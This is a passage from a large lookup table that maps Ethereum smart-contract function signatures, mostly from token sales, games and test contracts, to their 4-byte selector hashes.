"0xec2efe40", "allstocksFund()": "0x48823786", "startingFeeBalance()": "0x1a04d5c5", "statusOperation()": "0x1be35b0c", "adminMode()": "0x90de8234", "advisorsTokensAddress()": "0xd20f5029", "RoundCSold()": "0x3c8c681a", "periodICOStage6()": "0xfba71fe9", "IRC_PER_ETH_PRE_SALE()": "0x3695507b", "opVaultAddr()": "0x4dce4142", "AUTH_ADDOWNER()": "0x95437056", "CPBWallet()": "0xc9e9ff2c", "nullify()": "0xece20f36", "addressFundTeam()": "0x7858f93a", "preAllocation()": "0xd3b7bcf1", "maxTokensPerAccount()": "0x9a02edfe", "dealsNumber()": "0x1c3f2f8c", "limitTier1()": "0xe1db206c", "getWinnersLen()": "0x8ada80a2", "referrerLevel2Percent()": "0xb0e547e8", "getShipCount()": "0x1704c271", "PRICE_1()": "0x4891f401", "taxToken()": "0x1fc928ae", "drawingNo()": "0xe6eb00ce", "nextPE()": "0x224a6ac3", "thisContactsTokens()": "0x01863f79", "PRICE_PRESALE_WEEK3()": "0x76102b3c", "asset()": "0x38d52e0f", "withdrawBountyAndAdvisory()": "0x3f6c4cfd", "dateInit()": "0xbf43ed4d", "adviserAndBounty()": "0xdb543fdc", "ROLE_COO()": "0xbac9dbab", "ownerTemp()": "0x5b5fa6ba", "PRESALE_PERCENTAGE_4()": "0x17f6252f", "bountyFeeCount()": "0xa1119bf2", "totalEthAmount()": "0x0429b9ca", "round5TokensRemaning()": "0x54ce0851", "presaleMaxSupply()": "0x08fc299b", "reservedTokensPercent()": "0x388fb0af", "totalBalanceClaimed()": "0xb580a7a1", "preSaleSecondStartDate()": "0x7b58120f", "supplyCap()": "0x8f770ad0", "snapshotBlock()": "0x1f90b2a5", "totalPausedSeconds()": "0x35a6c1e0", "_investorCount()": "0x18dfcf7b", "Project()": "0x15bf430d", "Client()": "0x8eaa9c91", "addThing(bytes32,string,string,bytes32)": "0x98ec341d", "deliver()": "0xfd3e50a7", "SafeSend(address)": "0xd7085e05", "flightDone()": "0xa1b3ef4b", "getFlight()": "0x31fdb712", "buyATCToken()": "0x825374ba", "tradeStream()": "0x646439a3", "placeTicket()": "0x984bc8c5", "setFlightPrice(uint256)": "0x5a41d508", "_checkClientSign(address,bytes32,bytes)": "0xc902d1b6", "_transferCoins(address,address,address,uint256)": "0x753ea1be", "changeMainContractInCoin(address,address)": "0x085fa50a", "transferWithChange(uint256,address,address,address,uint256,uint256,bytes,bytes,bytes)": "0xdd0e7832", "transfer(uint256,address,address,address,uint256,bytes,bytes)": "0x3fedcc31", "cashout(uint256,address,address,address,uint256,bytes,bytes)": "0xe19593e5", "swap(uint256,address,address,address,address,uint256,uint256,bytes,bytes,bytes)": "0xd1037a11", "MainExchange()": "0xc9653bea", "countThisRecursive(uint256)": "0x8c5344fa", "countLocalRecursive(uint256)": "0x96ffa690", "ReentrancyMock()": "0xef12af52", "touch()": "0xa55526db", "verifyOperation(address,uint32)": "0x3a38a08c", "removeOperationType(uint32)": "0xdc39e5fe", "removePerformer(address)": "0xf13b8d66", "addOperationType(string,string)": "0x84ca65e0", "addPerformer(address,string,uint8,string)": "0x5021783a", "Registry(string)": "0xe5b2169f", "closeIco()": "0x48546971", "token(bool,address,address,address,address,address[],uint256[])": "0x8e05beb3", "vote(bool,address)": "0x633dfc70", "startNewVote(uint256,string)": "0xc851ed7c", "newVote(uint256,string)": "0x54f9cbb3", "VoteFactory()": "0x40067c91", "readIncUpdatedOn(string)": "0x3540b529", "readTaskCreatedOn(string)": "0xb0388344", "readTaskState(string)": "0xddb62333", "readOpentasks()": "0x5062ef16", "updateTaskState(string,string)": "0x34a6e514", "calculateTaskDeposit(uint256)": "0x6ec236ed", "createTask(address,string,string,uint256)": "0x78c3e2ec", "refund(address)": "0xfa89401a", "enableRefunds()": "0x8c52dc41", "RefundVault(address)": "0xa83cf7fe", "double(int256)": "0x6ffa1caa", "record(bytes32)": "0xb5c645bd", "setSubRegistrar(bytes32,address)": "0x89a69c0e", "setAddress(bytes32,address,bool)": "0xbe99a980", "subRegistrar(bytes32)": "0x5a3a05bd", "d()": "0x8a054ac2", "getY(uint256,bool)": "0x606d55b1", "getX()": "0x5197c7aa", "s()": "0x86b714e2", "ControlStructure(uint256)": "0x07695379", "MintableMultiownedTokenTestHelper(address[],uint256,address)": "0x609bdc71", "setMaxSecurityGuardDelay(uint256)": "0xda4793ac", "setTimelock(uint256)": "0x1e891c0a", "setSecurityGuard(address)": "0xbb2a51d1", "authorizeSpender(address,bool)": "0x793c0fd4", "delayPayment(uint256,uint256)": "0x846a5dde", "collectAuthorizedPayment(uint256)": "0x92e4b8a4", "authorizePayment(address,uint256,uint256)": "0xc1733712", "numberOfAuthorizedPayments()": "0x68b8c5a1", "setupEventsHistory(address)": "0x02927d20", "_error(uint256,bytes32)": "0x7ed9d3a3", "DelayedPayments(uint256,uint256,uint256)": "0x3438c758", "emitError(bytes32)": "0xe90459f8", "callSend(address,uint256)": "0x752c5628", "PullPaymentMock()": "0xc07b18ca", "getNickname(address,address)": "0xca9a9386", "newToken(string,string)": "0x4629ffea", "IssueTokenFactory()": "0x80806362", "process()": "0xc33fb877", "getAccountsSize()": "0xb7eb22b3", "getAccounts()": "0x8a48ac03", "addPresale(address,uint256,uint256)": "0x69d0292d", "adminAddress()": "0xfc6f9468", "setAdminAddress(address)": "0x2c1e816d", "contractExists(address)": "0x7709bc78", "showUserBalance(address)": "0x46b4320c", "Mixer()": "0x21b8151e", "test_standardCampaignDeploymentAndUse()": "0xdf3b75f0", "testThrow_testablePayoutCaseShouldBeFailure()": "0xdfe6af85", "test_testableContributionCaseExpectFailure()": "0x8e940bb7", "test_testableStandardCampaignRefund()": "0x821c9a57", "test_testableStandardCampaignPayoutToBeneficiary()": "0xe34e5786", "test_testableStandardCampaignContribution()": "0xe7e6aed1", "test_testablestandardcampaignDeploymentAndUse()": "0xb5930872", "test_testableStandardCampaignAbsolvementAfterPayout()": "0x4a9d9172", "test_standardCampaignConstructionValuesFailsDueToNoParameterValidation()": "0x5eb53bfa", "test_userSetup()": "0x05dad1c0", "payForward()": "0x18a39c54", "setTrg(address)": "0x463dfae6", "setSrc(address)": "0x9633303f", "addTimeToExpiry(uint256)": "0xc26c7472", "TestableStandardCampaign(string,uint256,uint256,address,address)": "0x65862330", "User()": "0x1429e26c", "newContribution(address,uint256)": "0x31c29c25", "newTestableCampaign(string,uint256,uint256,address)": "0x8ed5f2ca", "itemNameAddress(uint256)": "0x76fe3efa", "itemNameOf(uint256)": "0xddb8b099", "listItem(uint256,uint256,address,bytes32,address)": "0x73440745", "listMultipleItems(uint256[],uint256,address,bytes32)": "0x0074477d", "setItemName(uint256,bytes32)": "0x1362180e", "UECToken()": "0x9fa778d8", "setNick(string,string)": "0xe5042271", "countryofN(address)": "0x8602c8b6", "accountOfP(address)": "0x123b1dae", "accountOfN(address)": "0x5ec211a1", "SaleCount()": "0x967b2692", "HeartBoutToken()": "0x871ced4a", "tokenHasDistributed()": "0xde31482a", "mintMAN()": "0x0c3304d1", "MANToken(string,string,uint256,uint256)": "0x74d1eb3f", "MANHATTANPROXYWSHWY()": "0x39bf5462", "NeuralControl()": "0x0a5cf9bb", "NEURAL()": "0x2e574191", "RES(address,uint256,string,string,uint8)": "0x399075da", "finishPreSale4()": "0x17df5696", "balancePreSale4()": "0x76af9a1a", "preSale4()": "0xe0e5fffd", "TUBECOIN()": "0x7efc05ae", "_createGame(string,address,uint256)": "0x4eed965e", "createContractGame(string,uint256)": "0x9048f510", "EtherGames()": "0xfb55d09d", "SHIPToken()": "0xb0259633", "getetherpriceinUSD(address,uint256)": "0x6b8287a6", "PREICOstart()": "0xd1159747", "SigmaToken()": "0x38e55e89", "GWGFPLUS(uint256,string,string)": "0x20277ed7", "_buy(address,uint256)": "0x02fc2a8a", "MultiWhitelist(address)": "0x979c7a38", "ETFW()": "0xa9d05989", "TidealToken(address)": "0xa937f12b", "setTokenForSale(uint256,address)": "0x194dee32", "Tacoin(uint256,string,string)": "0x03e9287a", "Ez()": "0xb1091e1b", "finishAirdrops()": "0xbb971094", "airdropToken(address[],uint256[])": "0x554652ce", "getUnfreezedTokens(address)": "0x3dbe56f0", "unfreezeTokens(uint256)": "0xe7827e85", "showFreezedTokensAmount(address)": "0xb32f19f9", "freezeAllowance(address)": "0x25068a28", "dissalowFreezing(address)": "0x0086969f", "allowFreezing(address)": "0xd478f533", "checkIfCanUseTokens(address,uint256)": "0x95fe6865", "getAllValuesSum(uint256[])": "0x1b0db7fe", "removeDestinationByIndex(uint256)": "0x9330f97f", "addDestination(bytes32)": "0x570e0db5", "removeOriginByIndex(uint256)": "0x4f3fc162", "addOrigin(bytes32)": "0x285c22b1", "setMaxDepartureLim(uint256)": "0x3cd99b70", "setMinDepartureLim(uint256)": "0x06d978b2", "UGVCToken()": "0x2f254d09", "RADIUM()": "0x735d45e1", "OChain()": "0xb16afaf6", "APOTokenCrowdsale()": "0x4ea73b07", "MORCO()": "0x2e9a3869", "_removeOwnersAproves(address)": "0x9cc5dd95", "cancelRemoveOwnerRequest2()": "0x714d5fae", "approveRemoveOwnerRequest2()": "0x82ffee45", "removeOwnerRequest2(address)": "0x2a75cb71", "cancelRemoveOwnerRequest()": "0x2534076e", "approveRemoveOwnerRequest()": "0xe6ee78bd", "removeOwnerRequest(address)": "0x3a253cee", "cancelAddOwnerRequest()": "0x19ba567c", "approveAddOwnerRequest()": "0x45448a28", "setAddOwnerRequest(address)": "0xf6973532", "cancelNewOwnersCountRequest()": "0x24ac4df1", "approveNewOwnersCount()": "0x027116f7", "setNewOwnersCountToApprove(uint256)": "0x4b1325ea", "cancelFinishMintingRequest()": "0x59ebbe35", "ApproveFinishMintingRequest()": "0x2e4bd18a", "finishMintingRequestSetup()": "0xd5aaadd1", "cancelMintRequest()": "0x8594bed0", "approveNewMintRequest()": "0xf78d5494", "setNewMintRequest(address,uint256)": "0x84a6469a", "addInitialOwners(address[])": "0xe44c96c9", "JBToken()": "0x5eb1f936", "_HachirokuToken()": "0x9773b22e", "TheBeardToken()": "0x6da4fd5c", "TGxToken()": "0x194b81d0", "_burnTokens(uint256)": "0x4631db54", "SancojTokenContract()": "0x0fcb83f2", "SitcomToken()": "0x577c78f1", "openEgg(uint256,uint256)": "0xa5007da7", "currentEggPrice(uint256)": "0x34758cb3", "buyEgg(uint256,uint256)": "0x5333ee4d", "createEggScheme(uint256,uint256,uint256,uint256,uint256,uint256,bool,bool)": "0xcb29881c", "setOpenStatusEgg(uint256,bool)": "0x27a1f35a", "setActiveStatusEgg(uint256,bool)": "0x2a3966ff", "getPurchased(uint256)": "0xbafc1437", "listActiveEggs()": "0xcd76faf5", "listEggsIds()": "0x1a9c4571", "eggExists(uint256)": "0x58f10528", "EggFactory(address)": "0x00e6abbe", "GoWalletProject()": "0xbc76dca0", "_getMaker(bytes32,uint8,bytes32,bytes32)": "0xf05492e0", "claimFeeRebate(uint256,bytes32,bytes32,bytes32,uint8)": "0x1d19a56d", "txnTax()": "0x7423d96e", "improvementContract()": "0xd621c878", "bonus2()": "0x67e8d3d2", "founderEggSupply()": "0x1994ad1e", "requestTokensFromCrowdsale()": "0x982078b8", "suicaId()": "0xb2a082b9", "recoveryAllowed()": "0xfc2f5e67", "MAX_AVAILABLE_JOINTTOKENS()": "0xb1fc8466", "levelThreeTokenNum()": "0x5279a5f8", "savedBalanceToken()": "0x21346edd", "MeetingsEntity()": "0xb8109e1a", "releaseTime2()": "0x59befd58", "MINI_GAME_BETWEEN_TIME()": "0xd7ecb5e3", "lastTimePriceSet()": "0x9a5a2d4e", "MAXIMUM_LOOP_BOUND()": "0x0e0c8241", "operationsEthWallet()": "0xd3964ca1", "TEAM_BONUS_PER_CENT()": "0xd57a0577", "MCoin()": "0xb037e4f5", "ADVISORS_CAP()": "0x6e779481", "heldTotal()": "0xb3097a08", "mainToken()": "0x3fc15f15", "usedSummReserve()": "0xb072bd10", "atxToken()": "0x98270d24", "recipient3()": "0x3ff8da5f", "terms()": "0xd5025625", "_agent()": "0xfc4c0daa", "privateSale1Hardcap()": "0xe16ba8c6", "PRIZE_POT_PERCENTAGE_MAX()": "0x969ac477", "activatedSalesTotalCount()": "0x38a326e4", "firstRoundWMEnd()": "0xf7fb4801", "StexIssued()": "0xa6441979", "my_message()": "0x9d56998d", "bootyToken()": "0x50a9b541", "reserveOwner()": "0xe61b6557", "rewardsTokenSupply()": "0xda62a246", "app()": "0xb76564bd", "ONE_TOKENS()": "0x16ed2ae4", "addrFWD()": "0x284e1567", "minimumBuy()": "0x05785e4c", "secondPay()": "0x9448807a", "winAmount()": "0xdecb3a90", "CORReserveAllocation()": "0x4f04af35", "FounderFeeInPercent()": "0x9631c1bd", "vaultContract()": "0x2274346b", "oIDIndex_()": "0x351314a5", "lastBlockSet()": "0x2722692c", "RESERVED_PARTNERS_LOCKED_SIDE()": "0x3d37ef8c", "nextMintPossibleTime()": "0x38ab0287", "levelExpAdjustment()": "0x1eea92c1", "currentPeriodPrice()": "0xf2147f7b", "price0()": "0xa0a986f1", "expiredTime()": "0x8e32e421", "canSetTransferable()": "0xdca6058c", "DEVELOPER_FEE_FRAC_TOP()": "0x5ed75366", "teamPercent()": "0xe164ac50", "parameterizerFactory()": "0x2d3d165d", "lastBlock_v19()": "0x426201ef", "continueCrowdsale()": "0xcbec455f", "t3tokenExchangeRate()": "0x676452f4", "icoLaunchTimestamp()": "0xfff35670", "BONUS_DURATION_1()": "0xbc451844", "estateRegistry()": "0xe387d31a", "preICOprice()": "0x7c905c9f", "hourPotExpiration()": "0xf3afe129", "vigAddress()": "0x804afd9e", "getArts()": "0x632ca5c9", "freePeriodEndTime()": "0x099c7ab2", "roundStartTime()": "0xdd4f8f74", "backlog()": "0x39af0513", "autonomousConverter()": "0x50b48c5e", "ICO_PERCENTAGE_5()": "0x975c95da", "guardian1Vote()": "0xea5b561f", "fromContractAddr()": "0x376ef9b8", "amout()": "0x32da7448", "loanActivation()": "0x22239e8e", "presale2_startdate()": "0xe754a4e5", "datboiSupply()": "0x972c169e", "totalEthFundRecieved()": "0xa4d55686", "secondStageEndsAt()": "0x87c2ee62", "debtor()": "0x9cb64a2d", "earlybird_coins()": "0x364f6695", "dropStart()": "0x76324597", "buyingPrice()": "0x399c0425", "winningTimestamp()": "0x15ce09ad", "GetMinimumBet()": "0xa873b155", "tokenListContract()": "0xfbc47e56", "streamerContract()": "0x5588b929", "totalContrib()": "0x1e2d5651", "confirmationPeriod()": "0x0429b880", "testState()": "0x57950697", "PRE_PUBLIC_LOCKUP_PERIOD()": "0xfb6aeb42", "Notes()": "0xd7651471", "CHINESE_EXCHANGE_1()": "0x9fe39d85", "presalePiEnd()": "0xdd0f5a9a", "stageMarketing()": "0x66b3e4b9", "PARTICIPATION_FEE()": "0x49943a13", "earlyBirdDuration()": "0x0cd5ea83", "SCADA_requires_hard_cap()": "0x280c2604", "units50percentExtra()": "0x9e12f15b", "PHASE_NUMBER()": "0x756dc34a", "releaseDragonTokens()": "0x3f4b1401", "updateDragonPrice(uint256)": "0x4b1f15d1", "ScamCoin()": "0x9cf17d5f", "HealthCoin()": "0xc110e6a0", "TokenFrank()": "0xab19fff9", "BYTC()": "0x634710ae", "NewStage()": "0x69e1b5ce", "hasPurchased()": "0x918c783a", "listFaceToFaceAttendants()": "0xc5c80103", "listAllAttendants()": "0xcf083591", "addAttendantAndTransfer(string,string,bool)": "0xb7e1ecef", "register(string,string,bool)": "0xd7fc1b9b", "SmartContractWorkshop(string)": "0x688257e0", "Jack()": "0x057d2c17", "CAPToken(address)": "0x7b865061", "Marble()": "0x44f1beed", "authorizeTransaction(uint256,address)": "0x59a23200", "IPMCoin()": "0x0e997ce3", "Ethereumbonus()": "0xd19d8e1a", "Profit1000()": "0x82104786", "PhantomToken()": "0xbf18dfbe", "BTM()": "0x8ef292fc", "DungeonTokenAuction(uint256)": "0xe3218219", "migrateDungeon(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x1c9e9999", "_createDungeon(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x80e8b12a", "BET()": "0xb78d32cd", "Paid(uint256)": "0x581d416a", "SaiContest_Gaia()": "0x74e8288c", "RxEALTestSaleContract()": "0x8d91801a", "INCO()": "0x7ed83d50", "EIP20(uint256,string,string)": "0x7219fa11", "eosPRIVATE(uint256,uint256)": "0xbf23b411", "FlipToken()": "0x294e47e3", "InoCoin(uint256,string,string)": "0x3fd6b1db", "GameChannel(address,uint256,uint256,address,address,uint256)": "0x8bdbbca9", "GameChannelConflict(address,uint256,uint256,address,address,uint256)": "0x92bec526", "GameChannelBase(address,uint256,uint256,address,address,uint256)": "0x8dda811c", "ConflictResolutionManager(address)": "0xa2788b58", "atomicize(address[],uint256[],uint256[],bytes)": "0x68f0bcaa", "SetRoundTime(uint256)": "0x712f5e72", "SetPrice(uint256)": "0x4f5539c0", "SetTimes(uint256,uint256)": "0x2eae0d0a", "SetTakePot(uint256)": "0xd7c01c3e", "BuyIn()": "0x2c0a5c08", "PublicCheckGameStart()": "0x03c5f26a", "CheckGameStart(bool)": "0x2f86282e", "NextOpen()": "0x8c6310ac", "Open()": "0x59ebeb90", "GasWar()": "0x7e61e6ef", "Upfinex()": "0x71d5af66", "FootCoin(uint256,string,string)": "0xdb958f18", "MANHATTANPROXYBRDWY()": "0x641a8cb3", "VID(uint256,string,uint8,string)": "0x4af7eedf", "ETHDistributor()": "0x875f71a3", "BLOCKCURRICO()": "0x214958ba", "NvcFundCoin()": "0xcb5e4805", "taxTransfer(address,address,uint256)": "0x5ebcfe50", "setConsumerAddress(address)": "0xefe2c8a4", "onTaxTransfer(address,uint256)": "0xf276fdde", "onDecreaseApproval(address,address,uint256)": "0xf05ccd75", "onIncreaseApproval(address,address,uint256)": "0x5de2a21b", "onTransferFrom(address,address,address,uint256)": "0x50872d1e", "onMint(address,address,uint256)": "0x39a7c3d9", "setHookableTokenAddress(address)": "0xf77dc854", "calculateLRCUnlockAmount(uint256,uint256)": "0x51f68d80", "LRCFoundationIceboxContract(address,address)": "0xc6a00369", "HLCN()": "0x6ac3a100", "EYrickCoin()": "0x6cd56641", "releaseHeldCoins()": "0x6ce5b3cf", "createHoldToken(address,uint256)": "0xdee751ce", "getHeldCoin(address,address)": "0x217720d7", "changeTransferStats(bool)": "0xb602a917", "setup(address,address,uint256)": "0xcbe40622", "Sale(address)": "0x9160342e", "issueTokensMultiple(uint256[],uint256[])": "0x2096f2ff", "HoldCrowdsale(uint256,uint256,uint256,uint256,uint256,address,uint256,uint256,uint256,uint256,address)": "0xdd0ac8ac", "isWhiteListedAddress(address)": "0x0d42240a", "addAddressReferrals(address[],address[])": "0xab9213f3", "OnlyWhiteListedAddresses(address)": "0xc34e6e1b", "CappedCrowdsale(uint256,uint256,uint256)": "0x6c6c21af", "transferBurnRole(address)": "0xa215457a", "HoldToken(address)": "0x4b0e5044", "UTBTokenTest(uint256,string,string)": "0x30f4f396", "UNITPaymentGatewayList()": "0x040622a9", "GolemNetworkToken(address,address,uint256,uint256)": "0x63e60df5", "MithrilGauntlet()": "0xb8e31ee7", "CoinmakeToken()": "0xc8ea0cfa", "getaddress0()": "0x1068d056", "RUNtoken(uint256,string,string)": "0xc5d290d0", "TomBit(uint256,string,uint8,string)": "0x80334b8f", "TestToken(string,string,uint256)": "0xda0a5fe0", "computeAddressBonus(uint16)": "0xff596069", "computeBonus(uint16)": "0x263e74e6", "forwardFunds(uint256,address,address)": "0x9acab88c", "claimBonus(uint16)": "0x94fa3131", "Distribution(uint16,uint256,address)": "0xbace4cf6", "KolkhaToken(uint256)": "0xc33cfe36", "RepostiX(address,address)": "0x4bba8a58", "RabbitCoin()": "0xd730bfe2", "ICOCENTRAL()": "0x18d78358", "finalizeStage()": "0xa8f653fa", "OwnerUpdate(address,address)": "0x34376542", "getVoteAndTime(uint256,uint256)": "0x091a79b2", "getVotingNetworkDetails()": "0xf821a17c", "_calculateTokenAmount(uint256)": "0x5ef4d2af", "_updateStateIfExpired()": "0xb54050c2", "delistAddress(address)": "0x5a34508b", "whitelistAddrAndBuyTokens(address,uint256)": "0xc5eaccfd", "whitelistAddr(address)": "0x080a57f9", "generateDeed(string,bytes)": "0x66c7fb77", "_isERC721Contract(address,address,uint256,bytes)": "0x1cba6f79", "updateExchangeRate(uint256,uint256)": "0xfcc73637", "EthereumPro()": "0x8ff67e35", "kill(address[])": "0x3c0fc6ea", "bulkEtherSender(address[],uint256[])": "0xccec1461", "bulkTokenSender(address[],address[],uint256[])": "0xe79ab547", "getTokenRate(address)": "0x54dea00a", "updateInstantToken(address)": "0x11e3655f", "updateRate(address,uint256)": "0xb558d1ea", "QiToken()": "0xeb15d21b", "drawToken(address)": "0xe59de3a5", "airDropSame(address,address[],uint256)": "0x1f44a40f", "FrankTestToken1()": "0x4faea4d6", "HardClear()": "0xa4be2ea2", "lspToken()": "0xf19dd75b", "getADminFromDutchProxy(address)": "0x2c1e6e48", "getAdminFromMintedCappedProxy(address)": "0xb5b1fc05", "getProxyExecID(address)": "0x79984882", "dismissRoom(uint256)": "0xde575a02", "rollRoom(uint256,address)": "0x9950ace1", "openRoom(uint256,uint256,address)": "0xf953927e", "rollSystem(uint256,address)": "0x7ce01daf", "tryDismissRoom(uint256)": "0xa7d55b76", "fundReferrel(address,uint256)": "0xb484d371", "setReferralFund(uint256)": "0x8a7c20d7", "setOraGasLimit(uint256)": "0xdb747f21", "getUserBetsInARazInstance(uint256,uint256)": "0xb9b6990b", "checkParticipants()": "0x8e943c8b", "TradeBits()": "0x761522af", "setHello(string)": "0x435ffe94", "Kanicoin()": "0xc5907a34", "resetWinner()": "0x7d882e9b", "increasePot()": "0xeb2bab77", "checkWin(uint256[])": "0xd34b7e25", "submitLocation(uint256,uint8)": "0x052369a6", "addLocation(uint256)": "0x955d4412", "setLocation(uint256,uint256)": "0xc0f4d29b", "setAllLocations(uint256[])": "0x3ee822f4", "locationsLength()": "0x859832e6", "addToUnminted(uint256)": "0xf2c80435", "managementTransfer(address,uint256)": "0x8cfaabcc", "getDateRanges()": "0x0ca413a4", "updateMinimumContribution(uint256)": "0xacd1bdb4", "updateClosingTime(uint256)": "0x762a4f35", "updatePreSaleCloseTime(uint256)": "0x83212e74", "updatePrivateSaleCloseTime(uint256)": "0x2c44a261", "updateOpeningTime(uint256)": "0x04a4b776", "removeFromManagementWhitelist(address)": "0xfae24454", "addToManagementWhitelist(address)": "0xb1e1c18f", "DriveholicToken()": "0x266d8299", "issueCompanyTokens()": "0x8d1e6b56", "deliverSale(address,uint256)": "0x1f96938d", "deliverPresale(address,uint256)": "0x0556a66f", "transferbatch(address[],uint256[])": "0x61efc807", "UnpaidDivInt()": "0x54d1f77c", "burningCapableAccount(address[])": "0xed361c17", "OPTIToken()": "0x6ec23e53", "claimUpdateToken()": "0xeb4c9ae7", "terminateEscrow(address)": "0x1049f742", "releaseExpiredEscrow(address,address)": "0x79a89b06", "releaseEscrow(address)": "0x8b6f894f", "queryEscrow(address,address)": "0x721c555e", "createEscrow(address,uint256,uint256)": "0xe2ecb311", "EthereumDiamond()": "0x027a4425", "bytesToString(bytes)": "0x39614e4f", "etherSender(address,uint256)": "0xc0a41466", "maskSender(address)": "0xd74be848", "updateDescription(bytes)": "0x898fb033", "TokenTest123()": "0x1c3cbf07", "ReDraw()": "0x19863bb7", "_RaffleDraw()": "0x0dfa1140", "RaffleDraw()": "0xb6926b52", "SetupRaffle(string,string)": "0x278f49b9", "distributeFunds(uint256,uint256)": "0x482769f3", "getNbrOfPartyFor(address)": "0x971dbe0e", "isEligibleToPlay(address)": "0x4bd544e8", "executeRoom(uint256)": "0x34eea4a2", "enterWithReferral(uint256,address)": "0xb447968c", "createRoom(string,uint256)": "0x2db4f279", "RuletkaTestIo()": "0xacb748e9", "reDraw()": "0xc10fbf0e", "SetupRaffle(uint256)": "0x435e119e", "getHello()": "0x8da9b772", "POSSCOIN()": "0x175c9885", "ScholarToken()": "0x3d4a8b4e", "Coinbase()": "0xd021d8da", "CKCoin()": "0xda9bdbfc", "myReferralDividends()": "0xa6d87f7d", "iterate_get(uint256)": "0x5e331e62", "iterate_next(uint256)": "0xca34a0e3", "awardReferalBonus()": "0x54c15020", "allocateReferalBonus(address)": "0x5284a4c7", "hasAlreadyClaimed()": "0x1a006503", "claimFreeFirstCard(address)": "0xe0929b95", "releaseForGoolaTeam()": "0x6e9b41d4", "releaseForEarlyInit(address[],uint256)": "0xd0a579fb", "airdropBatchTransfer(address[],uint256)": "0xa3451568", "GoolaToken(address,address,address)": "0x933426f5", "ScienceToken()": "0xfcbf323a", "HIPHOP()": "0x25fc5f02", "setReleased(bool)": "0xd1fea3d5", "setReleaseTime(address,uint256)": "0x476fe919", "issueBlockReward()": "0x848125ea", "TokenUnionToken()": "0x08d10c91", "DID()": "0x3e44694f", "RektToken()": "0x62b6dc8e", "hashDifficulty(bytes32)": "0xcb2f7c49", "payBonus(address)": "0xa5828b7d", "payInterest(address)": "0xd007c644", "chown(address)": "0x886bb359", "setDifficulty(uint256)": "0x602512e1", "ILOTContract()": "0xc94f2d69", "AFTCoin()": "0xf7f2741c", "voteForAnswer(uint256,address,bool)": "0xea470d33", "placeAnswer(uint256,string)": "0x53677154", "placeQuestion(uint256,uint8,uint256,string)": "0x442bc74f", "changeVoteWeight(address,int256)": "0x30092ded", "Questions()": "0xc5cac386", "setMinVoteWeightK(uint256)": "0xf9bbcc6d", "setResetVoteKindnessEvery(uint256)": "0x4b9b808d", "setMaxAbsKindness(int256)": "0xb2281442", "setMinPaymentForAnswer(uint256)": "0xb6721bc4", "setComment(string)": "0xe8742b55", "Numisma()": "0x64cf9167", "NutrioCoin()": "0x5d3235bd", "WOCC()": "0x1b92ce6b", "Jcoin()": "0x08927a67", "DawnCoin()": "0x004db370", "checkVesting(uint256,uint256)": "0x5603a50d", "claimOtherTokens(address)": "0x405a66da", "fourth_release(uint256)": "0x3e0aba92", "third_release(uint256)": "0xab50e7f2", "second_release(uint256)": "0xdbcc6caf", "first_release(uint256)": "0xbd336584", "init_claim(uint256)": "0xabedeab4", "IHFVesting(address,uint256)": "0x99f02b60", "airDrop(address,address[],uint256[])": "0xe0882af8", "getVoterStatus(bytes32,address)": "0x95c5ed9d", "getStatusForRootHash(bytes32)": "0xfb00fec6", "getValidatorAddress(int256)": "0x813d599f", "getQtyValidators()": "0x0694f9d6", "getTimestampProposal(bytes32)": "0x0d973d2e", "getProposals(uint256)": "0x2c72fdfc", "isConsensusObtained(uint256)": "0x4550fa72", "getOneByOneRootHash(uint256)": "0x76bef6b4", "getTotalQtyIpfsAddresses()": "0xbd8f997c", "howManyVoters(bytes32)": "0xa7bc8c46", "getProposedIpfs(bytes32)": "0x6b5d18fd", "getIpfsAddress(bytes32)": "0x06b3bcd1", "propose(bytes32,string)": "0x042e9a43", "setScoringThreshold(uint256)": "0xf5e7b8e3", "setLogicContract(address)": "0x5aa4470f", "revokeInitiator(address)": "0x04ee54d2", "addInitiator(address)": "0xb4210257", "revokeValidator(address)": "0x047564b7", "transferCanaryOwnership(address)": "0xac800b32", "transferSuperAdminOwnership(address)": "0x7d8fcfb4", "YDTToken()": "0xafda5460", "dist_list_set(address[],uint256[])": "0xf4749624", "Veen()": "0x8de575e4", "getAffiliateAmount(uint256)": "0xab207628", "changeAffiliatePercentage(uint256)": "0x94bbfb56", "changeServicePercentage(uint256)": "0xb53aab4c", "FeeWallet(address,uint256,uint256)": "0x96b5c5f4", "getFee(uint256)": "0xfcee45f4", "make(address,uint256,bytes)": "0x87fdc401", "cast()": "0x96d373e5", "setcreatorAddr(address)": "0xe14c5e17", "setInvadeAddr(address)": "0xb4b7771d", "zombieToken()": "0x93d48b11", "withdrawZOB(uint256)": "0x04b43c5a", "changeFreeZombiewCount(uint16)": "0xea584ee6", "createRandomZombie_Ether()": "0x37411dc3", "createRandomZombie_FreeZombie()": "0x1339305f", "createRandomZombie_ZOB_goldpack()": "0x84345b35", "createRandomZombie_ZOB_smallpack()": "0x048911a6", "isGetFreeZombiew(address)": "0x157d5956", "buyCard(address,uint256)": "0x7dd9f846", "OTTToken()": "0x13819313", "UNPC()": "0x5cfae3ba", "MTYToken()": "0x6b11dabd", "closeArea(uint256)": "0x4442bf02", "addArea(uint256,uint8,uint8[],uint256,string,uint256,bool,uint32)": "0x7d940912", "awardInvation(bytes32)": "0x4a85512f", "startInvasion(uint256,uint256[])": "0xc6335b26", "seeZombieColor(uint256)": "0xf0c295fd", "waipaytoken()": "0xd7790c11", "TXQToken(address,uint256)": "0x2b4ca103", "allWeights()": "0xc1f04f3c", "allBalances()": "0x555b6162", "crowdsaleAgent()": "0x0b7d6320", "claimCount()": "0x8da4d3c9", "LastExecuted()": "0xf749d980", "tokensPerKEther()": "0xa5bc770c", "End3()": "0xd0f76bb8", "BONUS_ICO_STAGE2()": "0x14b11606", "eventManager()": "0x8fd611be", "updatesAreAllowed()": "0x87b7a068", "TokenAddress()": "0xc2cba306", "currBetID()": "0x9dea34ad", "highTimeBonusLimit()": "0x13932337", "closeGeneralSale()": "0xb0eb5162", "R2()": "0xfee2cb05", "countTokenHolders()": "0x070f0e96", "ContractBalance()": "0x3b668059", "maxTimeBonusPercent()": "0x23a1b159", "wavesTokens()": "0xfac65256", "MAT_PARTNERS_SUPPLY_LIMIT()": "0x78393237", "advisorAmount()": "0x278a3684", "tokenBonusForSecond()": "0x6d97c665", "rateFee()": "0x6921278a", "secondPreSaleEndDate()": "0x9a670bbc", "rewardAccount()": "0x0e708203", "VULCAN_POD_FTL_SPEED()": "0x942802e7", "limitAgentBets()": "0x4db94441", "wasGoalReached()": "0x6c4d0c00", "totalGambles()": "0xd91e1c63", "typeBuffPercentage()": 